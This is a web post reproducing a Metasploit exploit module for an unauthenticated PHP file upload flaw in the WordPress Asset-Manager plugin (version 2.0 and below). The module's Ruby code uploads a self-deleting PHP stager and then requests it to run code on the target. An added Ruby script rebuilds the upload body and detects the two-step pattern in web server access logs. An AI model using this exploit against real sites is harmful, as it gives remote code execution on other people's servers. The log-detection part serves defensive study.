WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, taken from the Metasploit exploit library, exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stager that writes/executes the real payload and deletes itself afterwards
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Single multipart part named "Filedata", which is what the plugin's upload.php expects
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strip the leading CRLF that Rex::MIME::Message emits before the first boundary
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Stage 1: unauthenticated upload into the plugin's temp directory
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored filename on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Stage 2: request the uploaded file so the web server executes it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
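As an added example (it is not part of the original post and not code from the Metasploit module), the Ruby script below shows both sides of what the module does: what the multipart upload body looks like on the wire, and how a defender would spot the two-step pattern in a web server access log, a POST to asset-manager/upload.php followed by a GET for a .php file under wp-content/uploads/assets/temp/. The log lines are constructed for the example; the WordPress root /wordpress/ is the module's default TARGETURI, and the function and constant names are the example's own.

```ruby
require 'securerandom'

# Paths used by the module on the page, relative to the WordPress root.
UPLOAD_PATH = 'wp-content/plugins/asset-manager/upload.php'
TEMP_DIR    = 'wp-content/uploads/assets/temp/'

# Build the multipart/form-data body the module sends: one part named
# "Filedata" whose filename ends in .php. Rex::MIME::Message emits a
# leading CRLF before the first boundary (which the module strips with a
# gsub); this builder starts at the boundary directly.
# Returns [content_type_header_value, body].
def build_upload_body(filename, content, boundary = "_Part_#{SecureRandom.hex(8)}")
  body = [
    "--#{boundary}",
    "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{filename}\"",
    "Content-Type: application/octet-stream",
    "",
    content,
    "--#{boundary}--",
    ""
  ].join("\r\n")
  ["multipart/form-data; boundary=#{boundary}", body]
end

# Apache/nginx "combined" access-log line (only the fields we need are captured).
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+/

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Scan log lines for the two stages the module performs:
#   1. POST to asset-manager/upload.php (the unauthenticated upload)
#   2. GET of a .php file under uploads/assets/temp/ (payload execution)
# Each finding is a hash; an execute-stage finding carries :after_upload,
# true when the same IP was already seen uploading earlier in the log.
def detect_asset_manager_upload(lines, wp_root: '/wordpress/')
  upload_uri = wp_root + UPLOAD_PATH
  temp_re    = /\A#{Regexp.escape(wp_root + TEMP_DIR)}[^\/?]+\.php(?:\?|\z)/i
  uploaded_from = {}
  findings = []
  lines.each do |line|
    e = parse_line(line) or next
    if e[:method] == 'POST' && e[:path].split('?').first == upload_uri
      uploaded_from[e[:ip]] = true
      findings << { ip: e[:ip], ts: e[:ts], stage: :upload, path: e[:path], status: e[:status] }
    elsif e[:method] == 'GET' && e[:path] =~ temp_re
      findings << { ip: e[:ip], ts: e[:ts], stage: :execute, path: e[:path],
                    status: e[:status], after_upload: uploaded_from.key?(e[:ip]) }
    end
  end
  findings
end

# Constructed sample log (not from any real server): one attacker doing the
# upload-then-execute sequence, plus an unrelated image fetch from the temp dir.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [31/Dec/2012:09:22:33 +0800] "GET /wordpress/ HTTP/1.1" 200 4521
  203.0.113.5 - - [31/Dec/2012:09:22:35 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 58
  203.0.113.5 - - [31/Dec/2012:09:22:36 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzxa.php HTTP/1.1" 200 0
  198.51.100.7 - - [31/Dec/2012:09:30:01 +0800] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 81234
LOG

if __FILE__ == $0
  ctype, body = build_upload_body('kqzxa.php', "<?php echo 'x'; ?>")
  puts "Content-Type: #{ctype}"
  puts body.inspect
  detect_asset_manager_upload(SAMPLE_LOG.lines).each { |f| p f }
end
```

Two things worth keeping in mind when using the detection half: a 200 on the temp-directory GET means the web server handed the file to PHP, which is exactly the condition the module treats as success, and because the module builds its stager with :unlink_self the file is gone from disk afterwards, so the access log is often the only evidence left. The 5-letter random name the module picks is not something to match on; any .php served out of that directory is the signal.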